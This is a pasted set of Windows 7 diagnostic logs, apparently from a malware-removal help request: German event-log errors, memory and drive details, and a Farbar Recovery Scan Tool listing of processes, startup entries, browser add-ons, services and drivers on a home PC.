Error: (03/26/2015 01:35:43 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (03/26/2015 01:35:37 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (03/26/2015 01:34:29 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (03/26/2015 01:34:27 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. 
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (03/26/2015 01:34:18 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (03/26/2015 01:34:17 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". System errors: ============= Error: (03/26/2015 00:50:22 PM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT) Description: Es wurde eine schwerwiegende Warnung generiert: 43. Der interne Fehlerstatus lautet: 252. Error: (03/26/2015 00:50:22 PM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT) Description: Es wurde eine schwerwiegende Warnung generiert: 43. Der interne Fehlerstatus lautet: 252. Error: (03/26/2015 00:27:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "PDF Architect 2 Creator" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT) Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252. 
Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT) Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252. Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT) Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252. Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT) Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252. Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT) Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252. Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT) Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252. Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT) Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252. 
Microsoft Office Sessions:
=========================
Error: (03/26/2015 01:38:05 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:38:04 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:35:50 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:35:45 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:35:43 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:35:37 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:34:29 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:34:27 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:34:18 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:34:17 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL


==================== Memory info ===========================

Processor: Intel(R) Core(TM)2 Quad CPU Q8200 @ 2.33GHz
Percentage of memory in use: 42%
Total physical RAM: 3327.05 MB
Available physical RAM: 1899.14 MB
Total Pagefile: 6652.4 MB
Available Pagefile: 4605.05 MB
Total Virtual: 2047.88 MB
Available Virtual: 1889.5 MB

==================== Drives ================================

Drive c: (System Windows 7) (Fixed) (Total:447.03 GB) (Free:61.6 GB) NTFS
Drive d: (GS108Ev3) (CDROM) (Total:0.06 GB) (Free:0 GB) CDFS
Drive f: (Neue Platte) (Fixed) (Total:931.51 GB) (Free:168.39 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 447.1 GB) (Disk ID: 0C83BAF4)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=447 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 1853B33D)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Code:
defogger_disable by jpshortstuff (23.02.10.1)
Log created at 13:48 on 26/03/2015 (k)

Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.

Checking for services/drivers...

FRST Logfile:

Code:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 11-03-2015
Ran by k (administrator) on K-PC on 26-03-2015 13:50:53
Running from C:\Users\k\Downloads\trojaner anleitung
Loaded Profiles: k (Available profiles: k)
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X86) OS Language: Deutsch (Deutschland)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\sched.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiWatchDog.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\Cyberlink\PowerCinema\Kernel\TV\CLCapSvc.exe
(Hauppauge Computer Works) C:\Program Files\WinTV\TVServer\HauppaugeTVServer.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(Hauppauge Computer Works) C:\Program Files\WinTV\TVServer\CaptureGenPCI.exe
(PGP Corporation) C:\Windows\System32\PGPserv.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtWatchDog.exe
() C:\Program Files\Cyberlink\Shared files\RichVideo.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\System32\UI0Detect.exe
() C:\Program Files\Cyberlink\PowerCinema\Kernel\TV\CLSched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\My Avira\Avira.OE.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreFrameworkHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Cyberlink\PowerCinema\PCMService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiSeAgnt.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\My Avira\Avira.OE.Systray.exe
(PGP Corporation) C:\Program Files\PGP Corporation\PGP Desktop\PGPtray.exe
(Hauppauge Computer Works, Inc.) C:\Program Files\WinTV\WinTV7\WinTVTray.exe
(IncrediMail, Ltd.) C:\Program Files\IncrediMail\bin\ImApp.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(ICQ, LLC.) C:\Program Files\ICQ7.5\ICQ.exe
(Microsoft Corporation) C:\Windows\System32\MDM.EXE
(The Wireshark developer community, hxxp://www.wireshark.org/) C:\Program Files\Wireshark\Wireshark.exe
(The Wireshark developer community) C:\Program Files\Wireshark\dumpcap.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7514656 2009-05-22] (Realtek Semiconductor)
HKLM\...\Run: [Skytel] => C:\Program Files\Realtek\Audio\HDA\Skytel.exe [1833504 2009-05-22] (Realtek Semiconductor Corp.)
HKLM\...\Run: [PCMService] => C:\Program Files\CyberLink\PowerCinema\PCMService.exe [151552 2007-08-10] (CyberLink Corp.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [1603152 2007-09-13] (CANON INC.)
HKLM\...\Run: [NvBackend] => C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe [1795872 2014-08-19] (NVIDIA Corporation)
HKLM\...\Run: [Trend Micro Client Framework] => C:\Program Files\Trend Micro\UniClient\UiFrmWrk\UIWatchDog.exe [165976 2014-07-20] (Trend Micro Inc.)
HKLM\...\Run: [Platinum] => C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe [1078832 2014-07-20] (Trend Micro Inc.)
HKLM\...\Run: [avgnt] => C:\Program Files\Avira\AntiVir Desktop\avgnt.exe [704512 2015-03-17] (Avira Operations GmbH & Co. KG)
HKLM\...\Run: [Avira Systray] => C:\Program Files\Avira\My Avira\Avira.OE.Systray.exe [126712 2015-01-19] (Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\...\Run: [IncrediMail] => C:\Program Files\IncrediMail\bin\IncMail.exe [251336 2009-09-07] (IncrediMail, Ltd.)
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\...\MountPoints2: {5f86d241-81ff-11e4-9728-806e6f6e6963} - D:\.\Setup.exe
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\...\MountPoints2: {df79adaa-8230-11e4-9d85-806e6f6e6963} - D:\autostart.exe
AppInit_DLLs: PGPmapih.dll => PGPmapih.dll File Not Found
Lsa: [Notification Packages] scecli PGPpwflt
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\PGPtray.exe.lnk
ShortcutTarget: PGPtray.exe.lnk -> C:\Windows\Installer\{04A8595A-4B2F-4A20-BA5D-E6B371657FF8}\Icon6560581611.exe ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Symantec Fax Starter Edition-Anschluss.lnk
ShortcutTarget: Symantec Fax Starter Edition-Anschluss.lnk -> C:\Program Files\Microsoft Office\Office\1031\OLFSNT40.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinTV Recording Status..lnk
ShortcutTarget: WinTV Recording Status..lnk -> C:\Program Files\WinTV\WinTV7\WinTVTray.exe (Hauppauge Computer Works, Inc.)
Startup: C:\Users\k\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk
ShortcutTarget: Adobe Gamma.lnk -> C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
ShellIconOverlayIdentifiers: [IconOverlayHandlerAccessible] -> {3DBF5F01-3287-46EB-82CF-45AA5C241162} => C:\Windows\system32\PGPfsshl.dll (PGP Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.de/
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/de-de/?ocid=iehp
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\Software\Microsoft\Internet Explorer\Main,ICQ Search = hxxp://search.icq.com/search/results.php?q={searchTerms}&ch_id=osd
SearchScopes: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001 -> DefaultScope {B72A4286-AFD7-410F-8349-A7EC3ABCA6A2} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001 -> {6552C7DD-90A4-4387-B795-F8F96747DE19} URL = hxxp://search.icq.com/search/results.php?q={searchTerms}&ch_id=osd
SearchScopes: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001 -> {B72A4286-AFD7-410F-8349-A7EC3ABCA6A2} URL = https://www.google.com/search?q={searchTerms}
BHO: PDF Architect Helper -> {691B33B0-B86E-47F3-81C7-56E4FE3B929C} -> C:\Program Files\PDF Architect 2\creator-ie-helper.dll [2014-10-10] (pdfforge GmbH)
BHO: TmIEPlugInBHO Class -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll [2014-06-30] (Trend Micro Inc.)
BHO: TmBpIeBHO Class -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll [2014-07-11] (Trend Micro Inc.)
Toolbar: HKLM - PDF Architect Toolbar - {DEEB13D7-CEA9-45FB-B77C-E039BEC85221} - C:\Program Files\PDF Architect 2\creator-ie-plugin.dll [2014-10-10] (pdfforge GmbH)
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} https://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll [2014-07-11] (Trend Micro Inc.)
Handler: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll [2014-06-30] (Trend Micro Inc.)
Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\UIFramework\ProToolbarIMRatingActiveX.dll [2014-07-20] (Trend Micro Inc.)
Filter: application/octet-stream - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - mscoree.dll No File []
Filter: application/x-complus - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - mscoree.dll No File []
Filter: application/x-msdownload - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - mscoree.dll No File []
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Winsock: Catalog9 01 C:\Windows\system32\PGPlsp.dll [68728] (PGP Corporation)
Winsock: Catalog9 20 C:\Windows\system32\PGPlsp.dll [68728] (PGP Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1

FireFox:
========
FF ProfilePath: C:\Users\k\AppData\Roaming\Mozilla\Firefox\Profiles\c9upjmzt.default
FF SelectedSearchEngine: ICQ Search
FF Homepage: https://www.google.de/?gws_rd=ssl
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-05] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll [2014-05-22] (DivX, LLC.)
FF Plugin: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files\DivX\DivX Web Player\npdivx32.dll [2014-11-21] (DivX, LLC)
FF Plugin: @nvidia.com/3DVision -> C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll [2014-07-02] (NVIDIA Corporation)
FF Plugin: @nvidia.com/3DVisionStreaming -> C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2014-07-02] (NVIDIA Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-05] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-05] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [pdf_architect_2_conv@pdfarchitect.org] - C:\Program Files\PDF Architect 2\resources\pdfarchitect2firefoxextension
FF Extension: PDF Architect 2 Creator - C:\Program Files\PDF Architect 2\resources\pdfarchitect2firefoxextension [2014-12-12]
FF HKLM\...\Firefox\Extensions: [tmbepff@trendmicro.com] - C:\Program Files\Trend Micro\AMSP\module\20002\9.0.1069\9.0.1069\firefoxextension
FF Extension: Trend Micro BEP Firefox Extension - C:\Program Files\Trend Micro\AMSP\module\20002\9.0.1069\9.0.1069\firefoxextension [2015-03-26]
FF HKLM\...\Firefox\Extensions: [{BBB77B49-9FF4-4d5c-8FE2-92B1D6CD696C}] - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension
FF Extension: Trend Micro Osprey Firefox Extension - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension [2015-03-26]

Chrome:
=======
CHR Profile: C:\Users\k\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-12-12]
CHR Extension: (Google Drive) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-12-12]
CHR Extension: (YouTube) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-12-12]
CHR Extension: (Google Search) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-12-12]
CHR Extension: (Google Wallet) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-12-12]
CHR Extension: (Gmail) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-12-12]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2014-12-12] (Adobe Systems) [File not signed]
R2 AntiVirSchedulerService; C:\Program Files\Avira\AntiVir Desktop\sched.exe [432888 2015-03-17] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files\Avira\AntiVir Desktop\avguard.exe [432888 2015-03-17] (Avira Operations GmbH & Co. KG)
R2 Avira.OE.ServiceHost; C:\Program Files\Avira\My Avira\Avira.OE.ServiceHost.exe [182520 2015-01-19] (Avira Operations GmbH & Co. KG)
R2 CLCapSvc; C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLCapSvc.exe [290913 2007-08-10] () [File not signed]
R2 CLSched; C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLSched.exe [118879 2007-08-10] () [File not signed]
R2 HauppaugeTVServer; C:\Program Files\WinTV\TVServer\HauppaugeTVServer.exe [563712 2011-07-22] (Hauppauge Computer Works) [File not signed]
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-03-17] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-03-17] (Malwarebytes Corporation)
S2 PDF Architect 2 Creator; C:\Program Files\PDF Architect 2\creator-ws.exe [738856 2014-10-10] (pdfforge GmbH)
R2 PGPserv; C:\Windows\system32\PGPserv.exe [135288 2010-04-01] (PGP Corporation)
R2 Platinum Host Service; C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe [963632 2014-07-20] (Trend Micro Inc.)
R2 RichVideo; C:\Program Files\Cyberlink\Shared files\RichVideo.exe [262247 2007-08-10] () [File not signed]
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)
R2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 -ad -bt=0 [X]
S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]
S3 WinHttpAutoProxySvc; winhttp.dll [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [105864 2015-03-17] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [136216 2015-03-17] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [37352 2015-03-17] (Avira Operations GmbH & Co. KG)
S1 CXAVSAUD; C:\Windows\System32\DRIVERS\pvavsaud.sys [11008 2005-10-25] (Conexant Systems, Inc.)
R3 hcw88bda; C:\Windows\System32\drivers\hcw88bda.sys [182400 2008-04-18] (Hauppauge Computer Works, Inc)
R3 hcw88rc5; C:\Windows\System32\Drivers\hcw88rc5.sys [12288 2008-04-18] (Hauppauge Computer Works, Inc.)
R3 HCW88TSE; C:\Windows\System32\drivers\hcw88tse.sys [320256 2008-04-18] (Hauppauge Computer Works, Inc)
R3 hcw88vid; C:\Windows\System32\drivers\hcw88vid.sys [394880 2008-04-18] (Hauppauge Computer Works, Inc)
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x86.sys [48640 2009-08-23] (Atheros Communications, Inc.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2015-03-17] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [119512 2015-03-26] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2015-03-17] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [5810 2004-08-13] ()
R2 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R1 ssmdrv; C:\Windows\System32\DRIVERS\ssmdrv.sys [28520 2015-03-17] (Avira GmbH)
R1 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [108072 2014-07-14] (Trend Micro Inc.)
R0 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [302760 2014-07-14] (Trend Micro Inc.)
R0 TMEBC; C:\Windows\System32\DRIVERS\TMEBC32.sys [40736 2013-07-01] (Trend Micro Inc.)
R3 tmeevw; C:\Windows\System32\DRIVERS\tmeevw.sys [90936 2014-05-29] (Trend Micro Inc.)
R1 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [89032 2014-07-14] (Trend Micro Inc.)
R3 tmnciesc; C:\Windows\System32\DRIVERS\tmnciesc.sys [306232 2014-04-08] (Trend Micro Inc.)
R2 tmusa; C:\Windows\System32\DRIVERS\tmusa.sys [86840 2014-06-30] (Trend Micro Inc.)
U2 TMAgent; No ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-03-26 13:50 - 2015-03-26 13:50 - 00000000 ____D () C:\FRST
